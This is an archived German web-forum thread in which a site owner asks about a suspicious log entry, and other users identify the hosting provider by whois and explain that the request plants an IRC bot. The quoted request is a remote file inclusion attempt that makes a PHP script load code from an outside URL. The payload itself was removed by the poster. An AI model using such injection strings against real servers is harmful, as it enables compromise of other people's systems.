Du befindest Dich im Archiv vom ABAKUS Online Marketing Forum. Hier kannst Du Dich für das Forum mit den aktuellen Beiträgen registrieren.

Kennt wer diese IP?

Hier können Sie Ihre Fragen zum Thema Suchmaschinenoptimierung (SEO) / Positionierung stellen
Neues Thema Antworten
Andy.C
PostRank 5
PostRank 5
Beiträge: 249
Registriert: 22.03.2005, 04:01
Wohnort: Berlin

Beitrag von Andy.C » 17.10.2006, 18:20

IP: 217.160.230.167
Aufruf: ~/addon_keywordreplacer.php?pathToFiles=https://www.yagenoysentoplesen.com/spread.txt?
Aufenthaltsort gekürzt, und durch ~ ersetzt.

Agent: libwww-perl/5.64

Inhalt der spread.txt
/* CUT */


Was würdet Ihr davon halten? Jemand dies schonmal gesehen?
Ich gehe mal ganz stark von einem Hijacking versuch aus.
Allein das versucht wird auf /tmp und wget zuzugreifen lässt mich nicht gutes erahnen.

// EDIT
hab den Abschnitt oben entfernt. Zu gefärhlich.
Zuletzt geändert von Andy.C am 17.10.2006, 19:06, insgesamt 1-mal geändert.

Anzeige von ABAKUS

von Anzeige von ABAKUS »


Hochwertiger Linkaufbau bei ABAKUS:
  • Google-konformer Linkaufbau
  • nachhaltiges Ranking
  • Linkbuilding Angebote zu fairen Preisen
  • internationale Backlinks
Wir bieten Beratung und Umsetzung.
Jetzt anfragen: 0511 / 300325-0

Dembarko
PostRank 9
PostRank 9
Beiträge: 1074
Registriert: 19.07.2006, 13:11
Wohnort: NDhausen

Beitrag von Dembarko » 17.10.2006, 18:55

Hast du bei Schlund und Partner gehostet?

Code: Alles auswählen

Suchbegriff: 217.160.230.167
Adresse: whois.ripe.net

Suchergebnis:
% This is the RIPE Whois query server #2.
% The objects are in RPSL format.
%
% Note: the default output of the RIPE Whois server
% is changed. Your tools may need to be adjusted. See
% http://www.ripe.net/db/news/abuse-proposal-20050331.html
% for more details.
%
% Rights restricted by copyright.
% See http://www.ripe.net/db/copyright.html

% Note: This output has been filtered.
%       To receive output for a database update, use the "-B" flag

% Information related to '217.160.224.0 - 217.160.239.255'

inetnum:      217.160.224.0 - 217.160.239.255
netname:      SCHLUND-CUSTOMERS
descr:        Schlund + Partner AG
country:      US
admin-c:      UI-RIPE
tech-c:       UI-RIPE
remarks:      INFRA-AW
remarks:      in case of abuse or spam, please mailto: abuse@schlund.de
status:       ASSIGNED PA
mnt-by:       SCHLUND-MNT
source:       RIPE # Filtered

role:         Schlund NCC
address:      Schlund + Partner AG
address:      Brauerstrasse 48
address:      D-76135 Karlsruhe
address:      Germany
remarks:      For abuse issues, please use only abuse@schlund.com
remarks:      For NOC issues, please look at our AS 8560
phone:        +49 721 91374 50
fax-no:       +49 721 91374 20
e-mail:       abuse@schlund.com
admin-c:      SPNC-RIPE
tech-c:       SPNC-RIPE
nic-hdl:      UI-RIPE
mnt-by:       SCHLUND-MNT
source:       RIPE # Filtered

% Information related to '217.160.224.0/19AS8560'

route:        217.160.224.0/19
descr:        SCHLUND-USA-1
origin:       AS8560
mnt-by:       SCHLUND-MNT
source:       RIPE # Filtered
Zuletzt geändert von Dembarko am 17.10.2006, 19:08, insgesamt 1-mal geändert.

Pompom
PostRank 10
PostRank 10
Beiträge: 3751
Registriert: 10.09.2004, 16:38

Beitrag von Pompom » 17.10.2006, 19:00

Schau dir doch mal das da an:
https://www.yagenoysentoplesen.com/al

Man versucht dir einfach ein Progrämmle unterzuschieben, das dich dann im IRC als infiziertes System bekannt gibt.